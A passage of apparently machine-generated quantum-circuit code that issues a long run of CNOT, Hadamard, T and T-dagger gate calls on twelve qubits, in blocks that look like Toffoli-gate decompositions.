k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[8])
k.gate('cnot',[10,0])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[8])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('cnot',[10,0])
k.gate('h',[8])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[4])
k.gate('cnot',[6,5])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[4])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('cnot',[6,5])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[8])
k.gate('cnot',[10,0])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[8])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('cnot',[10,0])
k.gate('h',[8])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[4])
k.gate('cnot',[6,5])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[4])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('cnot',[6,5])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,3])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('cnot',[11,3])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[11])
k.gate('cnot',[2,1])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[11])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('cnot',[2,1])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,3])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('cnot',[11,3])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[11])
k.gate('cnot',[2,1])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[11])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('cnot',[2,1])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[7])
k.gate('cnot',[10,0])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[7])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('cnot',[10,0])
k.gate('h',[7])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[8])
k.gate('cnot',[5,4])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[8])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('cnot',[5,4])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[7])
k.gate('cnot',[10,0])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[7])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('cnot',[10,0])
k.gate('h',[7])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[8])
k.gate('cnot',[5,4])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[8])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('cnot',[5,4])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,3])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('cnot',[11,3])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[11])
k.gate('cnot',[2,1])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[11])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('cnot',[2,1])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,3])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('cnot',[11,3])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[11])
k.gate('cnot',[2,1])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[11])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('cnot',[2,1])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[7])
k.gate('cnot',[10,0])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[7])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('cnot',[10,0])
k.gate('h',[7])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[8])
k.gate('cnot',[5,4])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[8])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('cnot',[5,4])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[7])
k.gate('cnot',[10,0])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[7])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('cnot',[10,0])
k.gate('h',[7])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[8])
k.gate('cnot',[5,4])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[8])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('cnot',[5,4])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[6])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[6])
k.gate('cnot',[10,11])
k.gate('cnot',[6,10])
k.gate('cnot',[11,6])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[6])
k.gate('cnot',[6,10])
k.gate('cnot',[11,6])
k.gate('cnot',[10,11])
k.gate('h',[6])
k.gate('h',[10])
k.gate('t',[5])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,5])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('tdag',[9])
k.gate('cnot',[5,9])
k.gate('tdag',[5])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('cnot',[9,5])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[4])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,4])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('tdag',[8])
k.gate('cnot',[4,8])
k.gate('tdag',[4])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('cnot',[8,4])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,3])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('tdag',[7])
k.gate('cnot',[3,7])
k.gate('tdag',[3])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('cnot',[7,3])
k.gate('h',[8])
k.gate('h',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[7])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('h',[7])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,3])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('tdag',[7])
k.gate('cnot',[3,7])
k.gate('tdag',[3])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('cnot',[7,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[4])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,4])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('tdag',[8])
k.gate('cnot',[4,8])
k.gate('tdag',[4])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('cnot',[8,4])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[5])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,5])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('tdag',[9])
k.gate('cnot',[5,9])
k.gate('tdag',[5])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('cnot',[9,5])
k.gate('h',[10])
k.gate('h',[6])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[6])
k.gate('cnot',[10,11])
k.gate('cnot',[6,10])
k.gate('cnot',[11,6])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[6])
k.gate('cnot',[6,10])
k.gate('cnot',[11,6])
k.gate('cnot',[10,11])
k.gate('h',[6])
k.gate('h',[10])
k.gate('t',[5])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,5])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('tdag',[9])
k.gate('cnot',[5,9])
k.gate('tdag',[5])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('cnot',[9,5])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[4])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,4])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('tdag',[8])
k.gate('cnot',[4,8])
k.gate('tdag',[4])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('cnot',[8,4])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,3])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('tdag',[7])
k.gate('cnot',[3,7])
k.gate('tdag',[3])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('cnot',[7,3])
k.gate('h',[8])
k.gate('h',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[7])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('h',[7])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,3])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('tdag',[7])
k.gate('cnot',[3,7])
k.gate('tdag',[3])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('cnot',[7,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[4])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,4])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('tdag',[8])
k.gate('cnot',[4,8])
k.gate('tdag',[4])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('cnot',[8,4])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[5])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,5])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('tdag',[9])
k.gate('cnot',[5,9])
k.gate('tdag',[5])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('cnot',[9,5])
k.gate('h',[10])
k.gate('h',[5])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[5])
k.gate('cnot',[10,11])
k.gate('cnot',[5,10])
k.gate('cnot',[11,5])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[5])
k.gate('cnot',[5,10])
k.gate('cnot',[11,5])
k.gate('cnot',[10,11])
k.gate('h',[5])
k.gate('h',[10])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,4])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('cnot',[9,4])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[8])
k.gate('cnot',[2,1])
k.gate('cnot',[8,2])
k.gate('cnot',[1,8])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[8])
k.gate('cnot',[8,2])
k.gate('cnot',[1,8])
k.gate('cnot',[2,1])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,4])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('cnot',[9,4])
k.gate('h',[10])
k.gate('h',[5])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[5])
k.gate('cnot',[10,11])
k.gate('cnot',[5,10])
k.gate('cnot',[11,5])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[5])
k.gate('cnot',[5,10])
k.gate('cnot',[11,5])
k.gate('cnot',[10,11])
k.gate('h',[5])
k.gate('h',[10])
k.gate('t',[4])
k.gate('t',[9])
